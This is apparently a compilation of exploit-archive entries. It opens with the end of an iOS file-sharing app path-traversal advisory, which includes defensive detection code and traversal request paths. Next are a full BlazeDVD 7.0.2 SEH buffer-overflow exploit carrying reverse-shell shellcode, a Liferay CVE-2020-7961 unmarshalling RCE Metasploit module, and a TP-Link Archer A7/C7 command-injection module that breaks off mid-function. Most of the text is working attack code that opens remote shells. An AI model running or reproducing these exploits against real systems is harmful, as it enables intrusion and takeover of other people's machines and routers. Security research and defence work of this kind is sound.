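# Constructed share root; the advisory does not name the app container directory.
DOC_ROOT = "/srv/ifamily-share"


def resolve_request_path(doc_root, raw_path):
    """Map a request path onto doc_root, or return None when it would escape.

    The path is percent-decoded once (so %2e%2e is treated like ..), joined
    under the root and normalised with posixpath.normpath, which collapses
    '.', '..' and repeated slashes. The result must then be the root itself or
    lie below it. The PoC's `..` chain and its `//../` form both normalise to
    a parent of the root and are rejected; `/./` normalises to the root itself."""
    path = unquote(raw_path)
    if "\x00" in path:
        return None
    root = posixpath.normpath(doc_root)
    full = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


# Common Log Format lines constructed from the PoC requests (not real server logs).
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [14/Apr/2020:10:00:00 +0000] "GET /photos/a.jpg HTTP/1.1" 200 4096',
    '192.0.2.10 - - [14/Apr/2020:10:00:01 +0000] "GET /../../../../../../../../../../../../../../../../../../../../../../ HTTP/1.1" 200 2521',
    '192.0.2.10 - - [14/Apr/2020:10:00:02 +0000] "GET //../ HTTP/1.1" 200 2521',
    '192.0.2.10 - - [14/Apr/2020:10:00:03 +0000] "GET /./ HTTP/1.1" 200 2521',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def traversal_attempts(log_lines, doc_root=DOC_ROOT):
    """Detection pass over access-log lines: the request paths that would
    escape doc_root, in log order."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and resolve_request_path(doc_root, match.group("path")) is None:
            hits.append(match.group("path"))
    return hits


if __name__ == "__main__":
    for raw in ("/", "/./", "//../", "/%2e%2e/etc/passwd"):
        print(raw, "->", resolve_request_path(DOC_ROOT, raw))
    print(traversal_attempts(SAMPLE_ACCESS_LOG))
```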
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the iOS mobile application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
-
BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python

file = "exploit.plf"
offset = "A"*(612-4)              # padding up to the SEH record
nseh = "\xeb\x1e\x90\x90"         # next SEH: short jump (EB 1E) followed by NOPs
seh = "\x34\x31\x02\x64"          # SEH handler overwrite address
nops = "\x90" * 24                # NOP sled before the payload

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.121 LPORT=8888 -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"

buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()
-
Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
      'Description' => %q{
        This module exploits a Java unmarshalling vulnerability via JSONWS in
        Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
        to execute code as the Liferay user. Tested against 7.2.0 GA1.
      },
      'Author' => [
        'Markus Wulftange', # Discovery
        'Thomas Etrillard', # PoC
        'wvu' # Module
      ],
      'References' => [
        ['CVE', '2020-7961'],
        ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
        ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
        ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
      ],
      'DisclosureDate' => '2019-11-25', # Vendor advisory
      'License' => MSF_LICENSE,
      'Platform' => 'java',
      'Arch' => ARCH_JAVA,
      'Privileged' => false,
      'Targets' => [
        ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
      ],
      'DefaultTarget' => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # GET / response contains a Liferay-Portal header with version information
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.headers['Liferay-Portal']
      return CheckCode::Unknown(
        'Target did not respond with Liferay-Portal header.'
      )
    end

=begin
    Building the Liferay-Portal header:
    https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java

    Liferay-Portal header data:
    https://github.com/liferay/liferay-portal/blob/master/release.properties

    Example GET / response:
    HTTP/1.1 200
    [snip]
    Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
    [snip]
=end
    version, build = res.headers['Liferay-Portal'].scan(
      /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
    ).flatten

    unless version && (build = Integer(build) rescue nil)
      return CheckCode::Detected(
        'Target did not respond with Liferay version and build.'
      )
    end

    # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
    if build < 7201
      return CheckCode::Appears(
        "Liferay #{version} MAY be a vulnerable version. Please verify."
      )
    end

    CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # Start our HTTP server to provide remote classloading
    @classloader_uri = start_service

    unless @classloader_uri
      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
    end

    print_good("Started remote classloader server at #{@classloader_uri}")

    # Send our remote classloader gadget to the target, triggering the vuln
    send_request_gadget(
      normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
      # Required POST parameters for /api/jsonws/expandocolumn/update-column:
      # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
      'columnId' => rand(8..42), # Randomize for "evasion"
      'name' => rand(8..42), # Randomize for "evasion"
      'type' => rand(8..42) # Randomize for "evasion"
    )
  end

  # Convenience method to send our gadget to a URI with desired POST params
  def send_request_gadget(uri, vars_post = {})
    print_status("Sending remote classloader gadget to #{full_uri(uri)}")

    vars_post['+defaultData'] =
      'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'

    vars_post['defaultData.userOverridesAsString'] =
      "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"

    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => vars_post
    }, 0)
  end

  # Generate all marshalsec payloads for the Jackson marshaller:
  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
  def go_go_gadget
    # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
    gadget = Rex::Text.decode_base64(
      <<~EOF
        rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
        cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
        bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
        ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
        bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
        DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
        aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
        AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
        ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
        kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
      EOF
    )

    # Replace length-prefixed placeholder strings with our own
    gadget.sub!("\x00\x04HACK", packed_class_name)
    gadget.sub!("\x00\x03THE", packed_classloader_uri)
    gadget.sub("\x00\x06PLANET", packed_class_name)
  end

  # Convenience method to pack the classloader URI as a length-prefixed string
  def packed_classloader_uri
    "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
  end

end
-
TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
        'Description' => %q{
          This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer),
          running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture,
          firmware version 190726.
          The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker
          does not need any authentication to abuse it. After exploitation, an attacker will be able to execute
          any command as root, including downloading and executing a binary from another host.
          This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team
          (Pedro Ribeiro + Radek Domanski).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
          'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
          [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
          [ 'CVE', '2020-10882'],
          [ 'CVE', '2020-10883'],
          [ 'CVE', '2020-10884'],
          [ 'ZDI', '20-334'],
          [ 'ZDI', '20-335'],
          [ 'ZDI', '20-336' ]
        ],
        'Privileged' => true,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        'Payload' => {},
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
          'WfsDelay' => 15,
        },
        'Targets' => [
          [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)', {} ]
        ],
        'DisclosureDate' => "Mar 25 2020",
        'DefaultTarget' => 0,
      )
    )

    register_options(
      [
        Opt::RPORT(20002)
      ])

    register_advanced_options(
      [
        OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
      ])
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/webpages/app.1564127413977.manifest',
        'method' => 'GET',
        'rport' => 80
      })

      if res && res.code == 200
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      # connection failed: fall through and report Unknown
    end

    return Exploit::CheckCode::Unknown
  end

  def calc_checksum(packet)
    # reference table used to calculate the packet checksum
    # used by tdpd_pkt_calc_checksum (0x4037f0)
    # located at offset 0x0416e90 in the binary
    reference_tbl = [
      0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba,
      0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3,
      0x0e, 0xdb, 0x88, 0x32, 0x79, 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88,
      0x09, 0xb6, 0x4c, 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91,
      0x1d, 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, 0xde,
      0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, 0xd3, 0x85, 0xc7,
      0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, 0x7a, 0x8a, 0x65, 0xc9, 0xec,
      0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5,
      0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72,
      0x3c, 0x03, 0xe4, 0xd1, 0x4b, 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b,
      0x35, 0xb5, 0xa8, 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40,
      0x32, 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, 0x59,
      0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, 0xd0, 0x61, 0x16,
      0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, 0x99, 0xb8, 0xbd, 0xa5, 0x0f,
      0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24,
      0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d,
      0x76, 0xdc, 0x41, 0x90, 0x01, 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a,
      0x71, 0xb1, 0x85, 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33,
      0x78, 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, 0x18,
      0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, 0x63, 0x5c, 0x01,
      0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, 0xd8, 0xf2, 0x62, 0x00, 0x4e,
      0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57,
      0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c,
      0x62, 0xdd, 0x1d, 0xdf, 0x15, 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65,
      0x4d, 0xb2, 0x61, 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2,
      0x4a, 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, 0xfb,
      0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, 0x60, 0xb8, 0xd0,
      0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, 0x5f, 0xdd, 0x0d, 0x7c, 0xc9,
      0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86,
      0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f,
      0x5e, 0xde, 0xf9, 0x0e, 0x29, 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4,
      0x59, 0xb3, 0x3d, 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad,
      0xed, 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, 0x9a,
      0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, 0xdc, 0x16, 0x83,
      0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, 0x3e, 0x7a, 0x6a, 0x5a, 0xa8,
      0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a, 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1,
      0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe,
      0xf7, 0x62, 0x57, 0x5d, 0x80, 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7,
      0xfe, 0xd4, 0x1b, 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc,
      0xf9, 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, 0xd5,
      0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, 0xdf, 0xf2, 0x52,
      0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, 0xdd, 0x48, 0xb2, 0x36, 0x4b,
      0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36, 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60,
      0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79,
      0xcb, 0x61, 0xb3, 0x8c, 0xbc, 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36,
      0xcc, 0x0c, 0x77, 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f,
      0xc5, 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, 0x04,
      0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, 0xde, 0xae, 0x1d,
      0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, 0x9c, 0x02, 0x6d, 0x93, 0x0a,
      0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13,
      0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38,
      0x92, 0xd2, 0x8e, 0x9b, 0xe5, 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21,
      0x86, 0xd3, 0xd2, 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e,
      0x81, 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, 0x77,
      0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, 0x01, 0x0b, 0x5c,
      0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, 0xd3, 0x16, 0x6c, 0xcf, 0x45,
      0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2,
      0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb,
      0xae, 0xd1, 0x6a, 0x4a, 0xd9, 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0,
      0xa9, 0xbc, 0xae, 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9,
      0xbd, 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, 0xa6,
      0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, 0xd9, 0x67, 0xbf,
      0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b, 0x02, 0x2a, 0x6f, 0x2b, 0x94,
      0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]

    res = 0xffffffff

    # main checksum calculation
    packet.each_entry { |c|
